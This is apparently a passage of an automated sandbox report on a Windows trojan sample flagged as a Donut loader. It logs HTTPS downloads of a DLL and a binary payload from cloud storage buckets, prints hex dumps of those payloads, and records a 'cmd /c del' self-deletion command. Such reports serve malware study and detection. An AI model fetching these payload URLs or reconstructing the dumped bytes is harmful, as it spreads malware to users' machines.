                                                                Data Ascii: ~X~\MMtE;PR}t0UVEtV,Y^]UEVxCtV,Y^]UEV?tV,Y^]UVEtV,Y^]ju8BejJtJtJ
                                                                2024-07-25 15:03:21 UTC8184INData Raw: 4b f0 01 00 59 6a 0b 59 8b f0 8d 7b 08 f3 a5 8d 4d 90 e8 da f5 ff ff 8b c3 e8 1e c9 02 00 c2 04 00 55 8b ec 8b 45 0c 83 ec 2c 53 8b d9 56 57 89 43 04 8d 45 d4 50 c7 03 44 15 00 10 e8 0e f0 01 00 59 6a 0b 59 8d 7b 08 8b f0 f3 a5 5f 5e 8b c3 5b 8b e5 5d c2 08 00 6a 38 b8 03 cc 03 10 e8 0b c9 02 00 8b 7d 08 33 f6 8b de 89 5d f0 85 ff 74 44 39 37 75 40 6a 34 ff 15 30 93 06 10 59 89 45 08 89 75 fc 85 c0 74 1e 8b 4d 0c e8 e7 f9 ff ff 50 8d 4d bc e8 3e f4 ff ff 8b 4d 08 43 56 50 e8 7d ff ff ff 8b f0 89 37 f6 c3 01 74 08 8d 4d bc e8 3c f5 ff ff 6a 02 58 e8 7f c8 02 00 c3 6a 00 e8 08 ff ff ff c3 55 8b ec 8b 45 08 89 41 04 8b c1 c7 01 70 15 00 10 5d c2 04 00 83 61 04 00 c7 01 70 15 00 10 c3 55 8b ec 8b 45 0c 8b 49 0c 0f b6 d0 66 8b 45 08 6a 00 66 85 04 51 58 0f 95
                                                                Data Ascii: KYjY{MUE,SVWCEPDYjY{_^[]j8}3]tD97u@j40YEutMPM>MCVP}7tM<jXjUEAp]apUEIfEjfQX
                                                                2024-07-25 15:03:21 UTC8184INData Raw: 8b 4c 31 38 e8 93 f9 ff ff 0f b7 c0 8b c8 b8 ff ff 00 00 66 3b c1 75 20 8b 06 8b 48 04 03 ce 8b 41 0c 83 c8 01 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 3f ed ff ff eb 4a 8b 07 51 6a 48 8b cf ff 50 10 84 c0 74 3c 8b 06 8b 40 04 8b 4c 30 38 e8 6b f9 ff ff eb b3 8b 4d ec 8b 01 8b 50 04 03 d1 8b 42 0c 83 c8 04 83 7a 38 00 75 03 83 c8 04 6a 01 50 8b ca e8 fc ec ff ff b8 7b 0a 01 10 c3 8b 75 ec 83 4d fc ff 8b 0e 8b 49 04 03 ce 83 79 0c 00 75 04 b0 01 eb 19 8b 41 0c 83 c8 02 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 c7 ec ff ff 32 c0 e8 8f a8 02 00 c2 04 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7f 01 00 00 84 c0 74 1c 83 7e 14 10 72 04 8b 06 eb 02 8b c6 ff 75 0c 2b d8 8b ce 53 56 e8 b9 fa ff ff eb 43 57 8b 7d 0c 8b ce 6a 00 57 e8 ed 00 00 00 84 c0 74 2e 83 7e 14 10 72
                                                                Data Ascii: L18f;u HAy8ujP?JQjHPt<@L08kMPBz8ujP{uMIyuAy8ujP2US]VSt~ru+SVCW}jWt.~r
                                                                2024-07-25 15:03:21 UTC8184INData Raw: 75 05 33 c0 40 5d c3 6a 02 58 5d c3 a9 ff 7f ff ff 75 0a 66 83 39 00 75 04 33 c0 5d c3 33 c0 66 85 d2 0f 95 c0 83 e8 02 5d c3 55 8b ec 8b 45 08 83 c0 02 5d c3 55 8b ec 51 56 8b 75 08 d9 06 dc 1d 50 12 00 10 df e0 d9 ee f6 c4 05 0f 8b 0c 01 00 00 d9 45 0c dd e1 df e0 f6 c4 44 0f 8b fa 00 00 00 d9 06 dc 1d 40 12 00 10 df e0 f6 c4 41 75 12 dd d9 33 c0 dd d8 40 d9 05 00 31 06 10 e9 dd 00 00 00 d9 06 dc 0d 20 12 00 10 d9 5d 08 d9 45 08 d8 d2 df e0 dd da f6 c4 05 7a 08 d9 05 48 12 00 10 eb 06 d9 05 18 12 00 10 d9 5d 08 d9 45 08 de c2 d9 c9 e8 33 84 02 00 0f b7 c8 0f bf c1 89 45 08 db 45 08 d9 5d 08 d9 06 d9 45 08 dd 05 a0 11 00 10 d8 c9 de ea dc 0d 10 12 00 10 de e9 d9 5d 08 d9 05 30 31 06 10 d9 c0 d9 e0 d9 45 08 d8 d1 df e0 dd d9 f6 c4 41 75 0f d8 d1 df e0 dd
                                                                Data Ascii: u3@]jX]uf9u3]3f]UE]UQVuPED@Au3@1 ]EzH]E3EE]E]01EAu


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.75353982.156.94.134436932C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-07-25 15:03:24 UTC137OUTGET /zf_cef.dll HTTP/1.1
                                                                User-Agent: Mozilla/5.0
                                                                Host: leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
                                                                Cache-Control: no-cache
                                                                2024-07-25 15:03:24 UTC477INHTTP/1.1 200 OK
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 219584
                                                                Connection: close
                                                                Accept-Ranges: bytes
                                                                Content-Disposition: attachment
                                                                Date: Thu, 25 Jul 2024 15:03:24 GMT
                                                                ETag: "e864fe41a4fedec386a65cb456ca3066"
                                                                Last-Modified: Thu, 21 Mar 2024 19:42:27 GMT
                                                                Server: tencent-cos
                                                                x-cos-force-download: true
                                                                x-cos-hash-crc64ecma: 14474361187052609782
                                                                x-cos-request-id: NjZhMjY5M2NfNDZhYzE0MGJfMjNhODRfMjI1NmRlMw==
                                                                x-cos-server-side-encryption: AES256
                                                                2024-07-25 15:03:24 UTC7727INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 08 c4 f3 f5 4c a5 9d a6 4c a5 9d a6 4c a5 9d a6 45 dd 0e a6 46 a5 9d a6 8e 24 98 a7 5c a5 9d a6 8e 24 99 a7 46 a5 9d a6 8e 24 9e a7 4e a5 9d a6 8e 24 9c a7 48 a5 9d a6 07 dd 9c a7 49 a5 9d a6 4c a5 9c a6 2a a5 9d a6 bf 27 98 a7 4d a5 9d a6 bf 27 9d a7 4d a5 9d a6 bf 27 62 a6 4d a5 9d a6 bf 27 9f a7 4d a5 9d a6 52 69 63 68 4c a5 9d a6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$LLLEF$\$F$N$HIL*'M'M'bM'MRichLPEL
                                                                2024-07-25 15:03:24 UTC8184INData Raw: fa ff ff 68 70 a2 02 10 8b 4d 08 e8 a1 fa ff ff 68 70 a2 02 10 8b 4d 08 e8 94 fa ff ff 68 70 a2 02 10 8b 4d 08 e8 87 fa ff ff 68 70 a2 02 10 8b 4d 08 e8 7a fa ff ff 68 b4 a2 02 10 8b 4d 08 e8 6d fa ff ff 68 70 a2 02 10 8b 4d 08 e8 60 fa ff ff 68 70 a2 02 10 8b 4d 08 e8 53 fa ff ff 68 70 a2 02 10 8b 4d 08 e8 46 fa ff ff 68 70 a2 02 10 8b 4d 08 e8 39 fa ff ff 68 70 a2 02 10 8b 4d 08 e8 2c fa ff ff 68 70 a2 02 10 8b 4d 08 e8 1f fa ff ff 68 70 a2 02 10 8b 4d 08 e8 12 fa ff ff 68 70 a2 02 10 8b 4d 08 e8 05 fa ff ff 68 70 a2 02 10 8b 4d 08 e8 f8 f9 ff ff 68 70 a2 02 10 8b 4d 08 e8 eb f9 ff ff 68 70 a2 02 10 8b 4d 08 e8 de f9 ff ff 68 70 a2 02 10 8b 4d 08 e8 d1 f9 ff ff 68 70 a2 02 10 8b 4d 08 e8 c4 f9 ff ff 68 70 a2 02 10 8b 4d 08 e8 b7 f9 ff ff 68 70 a2 02 10
                                                                Data Ascii: hpMhpMhpMhpMzhMmhpM`hpMShpMFhpM9hpM,hpMhpMhpMhpMhpMhpMhpMhpMhpMhp
                                                                2024-07-25 15:03:25 UTC8184INData Raw: 10 8b 4d 08 e8 b0 da ff ff 68 70 a2 02 10 8b 4d 08 e8 a3 da ff ff 68 70 a2 02 10 8b 4d 08 e8 96 da ff ff 68 70 a2 02 10 8b 4d 08 e8 89 da ff ff 68 70 a2 02 10 8b 4d 08 e8 7c da ff ff 68 70 a2 02 10 8b 4d 08 e8 6f da ff ff 68 70 a2 02 10 8b 4d 08 e8 62 da ff ff 68 70 a2 02 10 8b 4d 08 e8 55 da ff ff 68 70 a2 02 10 8b 4d 08 e8 48 da ff ff 68 70 a2 02 10 8b 4d 08 e8 3b da ff ff 68 70 a2 02 10 8b 4d 08 e8 2e da ff ff 68 b4 a2 02 10 8b 4d 08 e8 21 da ff ff 68 70 a2 02 10 8b 4d 08 e8 14 da ff ff 68 70 a2 02 10 8b 4d 08 e8 07 da ff ff 68 b4 a2 02 10 8b 4d 08 e8 fa d9 ff ff 68 34 a4 02 10 8b 4d 08 e8 ed d9 ff ff 68 80 a3 02 10 8b 4d 08 e8 e0 d9 ff ff 68 ec a3 02 10 8b 4d 08 e8 d3 d9 ff ff 68 ec a6 02 10 8b 4d 08 e8 c6 d9 ff ff 68 8c a3 02 10 8b 4d 08 e8 b9 d9 ff
                                                                Data Ascii: MhpMhpMhpMhpM|hpMohpMbhpMUhpMHhpM;hpM.hM!hpMhpMhMh4MhMhMhMhM
                                                                2024-07-25 15:03:25 UTC8184INData Raw: ff ff 68 1c a8 02 10 8b 4d 08 e8 b2 ba ff ff 68 d4 a8 02 10 8b 4d 08 e8 a5 ba ff ff 68 68 a7 02 10 8b 4d 08 e8 98 ba ff ff 68 ec a3 02 10 8b 4d 08 e8 8b ba ff ff 68 c8 a5 02 10 8b 4d 08 e8 7e ba ff ff 68 70 a2 02 10 8b 4d 08 e8 71 ba ff ff 68 68 a7 02 10 8b 4d 08 e8 64 ba ff ff 68 e4 a8 02 10 8b 4d 08 e8 57 ba ff ff 68 a4 a2 02 10 8b 4d 08 e8 4a ba ff ff 68 f0 a8 02 10 8b 4d 08 e8 3d ba ff ff 68 70 a2 02 10 8b 4d 08 e8 30 ba ff ff 68 0c a6 02 10 8b 4d 08 e8 23 ba ff ff 68 70 a2 02 10 8b 4d 08 e8 16 ba ff ff 68 78 a5 02 10 8b 4d 08 e8 09 ba ff ff 68 fc a8 02 10 8b 4d 08 e8 fc b9 ff ff 68 f0 a5 02 10 8b 4d 08 e8 ef b9 ff ff 68 70 a2 02 10 8b 4d 08 e8 e2 b9 ff ff 68 70 a2 02 10 8b 4d 08 e8 d5 b9 ff ff 68 70 a2 02 10 8b 4d 08 e8 c8 b9 ff ff 68 0c a9 02 10 8b
                                                                Data Ascii: hMhMhhMhMhM~hpMqhhMdhMWhMJhM=hpM0hM#hpMhxMhMhMhpMhpMhpMh
                                                                2024-07-25 15:03:25 UTC16384INData Raw: 8b 4d 08 e8 c1 9a ff ff 68 68 a7 02 10 8b 4d 08 e8 b4 9a ff ff 68 34 ab 02 10 8b 4d 08 e8 a7 9a ff ff 68 70 a8 02 10 8b 4d 08 e8 9a 9a ff ff 68 1c a7 02 10 8b 4d 08 e8 8d 9a ff ff 68 48 a7 02 10 8b 4d 08 e8 80 9a ff ff 68 ec a3 02 10 8b 4d 08 e8 73 9a ff ff 68 fc a7 02 10 8b 4d 08 e8 66 9a ff ff 68 10 a7 02 10 8b 4d 08 e8 59 9a ff ff 68 a8 aa 02 10 8b 4d 08 e8 4c 9a ff ff 68 88 a7 02 10 8b 4d 08 e8 3f 9a ff ff 68 f8 a3 02 10 8b 4d 08 e8 32 9a ff ff 68 38 aa 02 10 8b 4d 08 e8 25 9a ff ff 68 0c a9 02 10 8b 4d 08 e8 18 9a ff ff 68 ac a5 02 10 8b 4d 08 e8 0b 9a ff ff 68 c8 a5 02 10 8b 4d 08 e8 fe 99 ff ff 68 60 a9 02 10 8b 4d 08 e8 f1 99 ff ff 68 94 a2 02 10 8b 4d 08 e8 e4 99 ff ff 68 94 a2 02 10 8b 4d 08 e8 d7 99 ff ff 68 94 a2 02 10 8b 4d 08 e8 ca 99 ff ff
                                                                Data Ascii: MhhMh4MhpMhMhHMhMshMfhMYhMLhM?hM2h8M%hMhMhMh`MhMhMhM
                                                                2024-07-25 15:03:25 UTC8168INData Raw: c5 5a ff ff 68 60 a9 02 10 8b 4d 08 e8 b8 5a ff ff 68 94 a2 02 10 8b 4d 08 e8 ab 5a ff ff 68 94 a2 02 10 8b 4d 08 e8 9e 5a ff ff 68 94 a2 02 10 8b 4d 08 e8 91 5a ff ff 68 58 a5 02 10 8b 4d 08 e8 84 5a ff ff 68 c0 a2 02 10 8b 4d 08 e8 77 5a ff ff 68 50 a8 02 10 8b 4d 08 e8 6a 5a ff ff 68 d8 a2 02 10 8b 4d 08 e8 5d 5a ff ff 68 48 a7 02 10 8b 4d 08 e8 50 5a ff ff 68 ac a5 02 10 8b 4d 08 e8 43 5a ff ff 68 58 a7 02 10 8b 4d 08 e8 36 5a ff ff 68 48 a7 02 10 8b 4d 08 e8 29 5a ff ff 68 70 a2 02 10 8b 4d 08 e8 1c 5a ff ff 68 10 a7 02 10 8b 4d 08 e8 0f 5a ff ff 68 f4 a9 02 10 8b 4d 08 e8 02 5a ff ff 68 7c ab 02 10 8b 4d 08 e8 f5 59 ff ff 68 64 ab 02 10 8b 4d 08 e8 e8 59 ff ff 68 3c a5 02 10 8b 4d 08 e8 db 59 ff ff 68 70 a2 02 10 8b 4d 08 e8 ce 59 ff ff 68 70 a2 02
                                                                Data Ascii: Zh`MZhMZhMZhMZhXMZhMwZhPMjZhM]ZhHMPZhMCZhXM6ZhHM)ZhpMZhMZhMZh|MYhdMYh<MYhpMYhp
                                                                2024-07-25 15:03:25 UTC8184INData Raw: 68 70 a2 02 10 8b 4d 08 e8 d4 3a ff ff 68 70 a2 02 10 8b 4d 08 e8 c7 3a ff ff 68 3c a7 02 10 8b 4d 08 e8 ba 3a ff ff 68 48 a7 02 10 8b 4d 08 e8 ad 3a ff ff 68 58 a7 02 10 8b 4d 08 e8 a0 3a ff ff 68 68 a7 02 10 8b 4d 08 e8 93 3a ff ff 68 24 a6 02 10 8b 4d 08 e8 86 3a ff ff 68 10 a5 02 10 8b 4d 08 e8 79 3a ff ff 68 f0 a8 02 10 8b 4d 08 e8 6c 3a ff ff 68 70 a2 02 10 8b 4d 08 e8 5f 3a ff ff 68 0c a6 02 10 8b 4d 08 e8 52 3a ff ff 68 70 a2 02 10 8b 4d 08 e8 45 3a ff ff 68 68 a7 02 10 8b 4d 08 e8 38 3a ff ff 68 58 a7 02 10 8b 4d 08 e8 2b 3a ff ff 68 58 a4 02 10 8b 4d 08 e8 1e 3a ff ff 68 68 a7 02 10 8b 4d 08 e8 11 3a ff ff 68 40 a4 02 10 8b 4d 08 e8 04 3a ff ff 68 a0 a5 02 10 8b 4d 08 e8 f7 39 ff ff 68 ac a6 02 10 8b 4d 08 e8 ea 39 ff ff 68 70 a2 02 10 8b 4d 08
                                                                Data Ascii: hpM:hpM:h<M:hHM:hXM:hhM:h$M:hMy:hMl:hpM_:hMR:hpME:hhM8:hXM+:hXM:hhM:h@M:hM9hM9hpM
                                                                2024-07-25 15:03:25 UTC8184INData Raw: 08 e8 e3 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 d6 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 c9 1a ff ff 68 d0 a6 02 10 8b 4d 08 e8 bc 1a ff ff 68 f4 a9 02 10 8b 4d 08 e8 af 1a ff ff 68 1c a7 02 10 8b 4d 08 e8 a2 1a ff ff 68 a8 ae 02 10 8b 4d 08 e8 95 1a ff ff 68 0c a6 02 10 8b 4d 08 e8 88 1a ff ff 68 b8 a6 02 10 8b 4d 08 e8 7b 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 6e 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 61 1a ff ff 68 f8 a3 02 10 8b 4d 08 e8 54 1a ff ff 68 04 a5 02 10 8b 4d 08 e8 47 1a ff ff 68 a4 a2 02 10 8b 4d 08 e8 3a 1a ff ff 68 80 ae 02 10 8b 4d 08 e8 2d 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 20 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 13 1a ff ff 68 d0 a6 02 10 8b 4d 08 e8 06 1a ff ff 68 f4 a9 02 10 8b 4d 08 e8 f9 19 ff ff 68 1c a7 02 10 8b 4d 08 e8 ec 19 ff ff 68 a8
                                                                Data Ascii: hpMhpMhMhMhMhMhMhM{hpMnhpMahMThMGhM:hM-hpM hpMhMhMhMh
                                                                2024-07-25 15:03:25 UTC8184INData Raw: 70 a2 02 10 8b 4d 08 e8 e5 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 d8 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 cb fa fe ff 68 70 a2 02 10 8b 4d 08 e8 be fa fe ff 68 d8 a2 02 10 8b 4d 08 e8 b1 fa fe ff 68 b8 a5 02 10 8b 4d 08 e8 a4 fa fe ff 68 c8 a5 02 10 8b 4d 08 e8 97 fa fe ff 68 ec a3 02 10 8b 4d 08 e8 8a fa fe ff 68 70 a2 02 10 8b 4d 08 e8 7d fa fe ff 68 70 a2 02 10 8b 4d 08 e8 70 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 63 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 56 fa fe ff 68 40 a4 02 10 8b 4d 08 e8 49 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 3c fa fe ff 68 70 a2 02 10 8b 4d 08 e8 2f fa fe ff 68 70 a2 02 10 8b 4d 08 e8 22 fa fe ff 68 b4 a2 02 10 8b 4d 08 e8 15 fa fe ff 68 20 a5 02 10 8b 4d 08 e8 08 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 fb f9 fe ff 68 70 a2 02 10 8b 4d 08 e8
                                                                Data Ascii: pMhpMhpMhpMhMhMhMhMhpM}hpMphpMchpMVh@MIhpM<hpM/hpM"hMh MhpMhpM
                                                                2024-07-25 15:03:25 UTC8184INData Raw: e8 f4 da fe ff 68 70 a2 02 10 8b 4d 08 e8 e7 da fe ff 68 70 a2 02 10 8b 4d 08 e8 da da fe ff 68 34 a4 02 10 8b 4d 08 e8 cd da fe ff 68 84 a6 02 10 8b 4d 08 e8 c0 da fe ff 68 28 a4 02 10 8b 4d 08 e8 b3 da fe ff 68 a4 a3 02 10 8b 4d 08 e8 a6 da fe ff 68 d4 a3 02 10 8b 4d 08 e8 99 da fe ff 68 a4 a3 02 10 8b 4d 08 e8 8c da fe ff 68 58 a4 02 10 8b 4d 08 e8 7f da fe ff 68 84 a6 02 10 8b 4d 08 e8 72 da fe ff 68 70 a2 02 10 8b 4d 08 e8 65 da fe ff 68 70 a2 02 10 8b 4d 08 e8 58 da fe ff 68 70 a2 02 10 8b 4d 08 e8 4b da fe ff 68 70 a2 02 10 8b 4d 08 e8 3e da fe ff 68 60 a2 02 10 8b 4d 08 e8 31 da fe ff 68 24 a6 02 10 8b 4d 08 e8 24 da fe ff 68 70 a2 02 10 8b 4d 08 e8 17 da fe ff 68 70 a2 02 10 8b 4d 08 e8 0a da fe ff 68 30 a6 02 10 8b 4d 08 e8 fd d9 fe ff 68 ac a4
                                                                Data Ascii: hpMhpMh4MhMh(MhMhMhMhXMhMrhpMehpMXhpMKhpM>h`M1h$M$hpMhpMh0Mh


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.75354043.153.232.1524436932C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-07-25 15:03:30 UTC123OUTGET /qd.bin HTTP/1.1
                                                                User-Agent: loader
                                                                Host: wwwqd-1323571269.cos.ap-singapore.myqcloud.com
                                                                Cache-Control: no-cache
                                                                2024-07-25 15:03:31 UTC472INHTTP/1.1 200 OK
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 40917
                                                                Connection: close
                                                                Accept-Ranges: bytes
                                                                Content-Disposition: attachment
                                                                Date: Thu, 25 Jul 2024 15:03:31 GMT
                                                                ETag: "8aa72f47438eebd6fe0e8c94bd206ca8"
                                                                Last-Modified: Fri, 22 Mar 2024 10:42:51 GMT
                                                                Server: tencent-cos
                                                                x-cos-force-download: true
                                                                x-cos-hash-crc64ecma: 16559786720377567833
                                                                x-cos-request-id: NjZhMjY5NDJfODU3NWI3MDlfZTM1NV82NmVhMzg=
                                                                x-cos-server-side-encryption: AES256
                                                                2024-07-25 15:03:31 UTC15912INData Raw: e8 c0 3d 00 00 c0 3d 00 00 60 39 6a c7 6b d8 0f c3 35 70 44 3f 1e 51 17 cf c5 f3 22 c1 66 20 37 e5 8c 68 07 12 1d b6 d8 9e 00 00 00 00 7d 5d 27 be b3 34 0c 4e 56 13 68 33 16 74 3e f3 b0 51 72 6f ab e4 d6 a1 ad 1f 95 81 42 81 27 22 12 69 b6 b7 a9 78 d1 38 9e 9a 52 58 b3 4b 37 10 d8 dd af 66 8f 6d 34 92 ff c7 2b ee 39 57 21 ad 46 a7 12 b3 d7 ac c8 36 f7 d8 01 66 1a b8 6c 36 db f9 c7 51 c9 66 51 e6 88 d2 81 3d 9d 46 25 79 13 0b 3d c8 00 48 e9 ee 63 df 7d 8c e2 78 7d 12 f9 cc e7 e2 3a b5 45 22 9f 22 ef cd 04 f0 68 c2 1c bf 9e de c2 f5 93 7e 28 d0 6b 05 a2 8b 3e 42 c2 15 6e 73 97 44 e1 03 ce 11 9c 00 18 43 db ec f8 ff 1d 71 b6 0a b3 3e 2b 43 51 30 05 82 14 02 56 81 73 fe 0f d5 13 d8 75 a3 7d b8 a0 26 49 de 2a 38 5f b5 21 06 3e 14 b3 3d 28 e2 3b 94 00 09 9a 2e
                                                                Data Ascii: ==`9jk5pD?Q"f 7h}]'4NVh3t>QroB'"ix8RXK7fm4+9W!F6fl6QfQ=F%y=Hc}x}:E""h~(k>BnsDCq>+CQ0Vsu}&I*8_!>=(;.
                                                                2024-07-25 15:03:31 UTC8188INData Raw: 20 4c 8b cb 33 d2 33 c9 ff d0 4c 8b 43 28 48 8b cb 48 8b 93 08 02 00 00 48 8b f8 e8 fc 2d 00 00 4c 8b 43 28 48 8b cb 48 8b 93 a0 00 00 00 4c 8b f0 e8 e6 2d 00 00 4c 8b 43 28 48 8b cb 48 8b 93 a8 00 00 00 48 8b f0 e8 d0 2d 00 00 33 c9 48 8b e8 ff 53 40 4c 8b f8 4d 85 f6 74 4f 48 85 f6 74 4a 48 85 ed 74 45 c7 44 24 60 0b 00 10 00 ff d5 48 8b c8 48 8d 54 24 30 ff d6 8b 83 38 02 00 00 48 8d 4c 24 30 48 83 a4 24 c8 00 00 00 f0 49 03 c7 33 d2 48 89 84 24 28 01 00 00 41 ff d6 eb 0b 48 83 c8 ff eb 08 e8 c9 12 00 00 48 8b c7 4c 8d 9c 24 00 05 00 00 49 8b 5b 20 49 8b 6b 28 49 8b 73 30 49 8b e3 41 5f 41 5e 5f c3 cc f0 ff 41 08 8b 41 08 c3 b8 01 40 00 80 c3 cc cc 4d 85 c0 75 06 b8 03 40 00 80 c3 4c 8b 49 10 49 8b 81 30 08 00 00 48 3b 02 75 0d 49 8b 81 38 08 00 00 48
                                                                Data Ascii: L33LC(HHH-LC(HHL-LC(HHH-3HS@LMtOHtJHtED$`HHT$08HL$0H$I3H$(AHHL$I[ Ik(Is0IA_A^_AA@Mu@LII0H;uI8H
                                                                2024-07-25 15:03:31 UTC16384INData Raw: 33 c9 4d 8d 44 24 02 49 8b d5 48 8b ce e8 66 0c 00 00 49 89 07 48 83 c7 08 4c 8b 85 28 03 00 00 49 83 c7 08 eb a1 48 83 c3 14 33 ff 39 7b 0c 0f 85 6e ff ff ff 4c 8b 75 88 4c 8b ad 18 03 00 00 4c 8b 64 24 78 41 8b 84 24 f0 00 00 00 85 c0 0f 84 86 00 00 00 48 8d 78 04 49 03 f8 8b 07 85 c0 74 77 8b d0 48 8b ce 49 03 d0 e8 21 0b 00 00 4c 8b 85 28 03 00 00 4c 8b e0 33 c0 4d 85 e4 74 4a 8b 5f 0c 44 8b 7f 08 49 03 d8 4d 03 f8 eb 33 79 08 44 8b 0b 4c 8b c0 eb 0a 49 83 c0 02 44 8b c8 4c 03 c1 49 8b d4 48 8b ce e8 ca 0b 00 00 49 89 07 48 83 c3 08 4c 8b 85 28 03 00 00 49 83 c7 08 33 c0 48 8b 0b 48 85 c9 75 c5 48 83 c7 20 8b 07 85 c0 75 8e 4c 8b 64 24 78 33 ff 45 8b 64 24 28 48 8d 4d a0 b8 02 00 00 00 4d 03 e0 4c 89 65 80 8d 50 7e 41 0f 10 06 41 0f 10 4e 10 0f 11 01
                                                                Data Ascii: 3MD$IHfIHL(IH39{nLuLLd$xA$HxItwHI!L(L3MtJ_DIM3yDLIDLIHIHL(I3HHuH uLd$x3Ed$(HMMLeP~AAN
                                                                2024-07-25 15:03:31 UTC433INData Raw: 2b 83 fa 02 75 26 8d 44 24 14 50 e8 e9 00 00 00 8b 54 24 1c 8b f0 59 85 f6 74 76 8b ca 2b cf 8a 01 88 02 42 41 83 ee 01 75 f5 eb 61 8b 4c 24 14 8d 44 24 14 83 f6 01 2b d6 c1 e2 08 0f b6 39 81 c7 00 fe ff ff 03 fa 41 50 89 4c 24 18 e8 a7 00 00 00 59 8b c8 81 ff 00 7d 00 00 72 01 41 8b 54 24 18 8d 41 01 81 ff 00 05 00 00 0f 42 c1 81 ff 80 00 00 00 8d 70 02 0f 43 f0 85 f6 74 13 8b ca 2b cf 8a 01 88 02 42 41 83 ee 01 75 f5 89 54 24 18 33 f6 46 eb 18 8b 4c 24 14 8b 54 24 18 8a 01 88 02 42 41 89 4c 24 14 33 f6 89 54 24 18 85 db 0f 84 9b fe ff ff 5f 5e 2b d5 5d 8b c2 5b 83 c4 14 c3 56 8b 74 24 08 8b 4e 0c 8d 56 08 8d 41 ff 89 46 0c 85 c9 75 13 8b 0e 0f b6 01 89 02 8d 41 01 89 06 c7 46 0c 07 00 00 00 8b 02 5e 8d 0c 00 c1 e8 07 89 0a 83 e0 01 c3 56 33 f6 46 ff 74
                                                                Data Ascii: +u&D$PT$Ytv+BAuaL$D$+9APL$Y}rAT$ABpCt+BAuT$3FL$T$BAL$3T$_^+][Vt$NVAFuAF^V3Ft


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:11:02:54
                                                                Start date:25/07/2024
                                                                Path:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\LisectAVT_2403002B_185.exe"
                                                                Imagebase:0x470000
                                                                File size:328'552 bytes
                                                                MD5 hash:0AAFD40537A281B281BD85EFCB2C976B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1711974357.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:11:02:54
                                                                Start date:25/07/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:12:50:01
                                                                Start date:25/07/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                Imagebase:0x410000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:12:50:01
                                                                Start date:25/07/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:9.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:5%
                                                                  Total number of Nodes:1138
                                                                  Total number of Limit Nodes:5
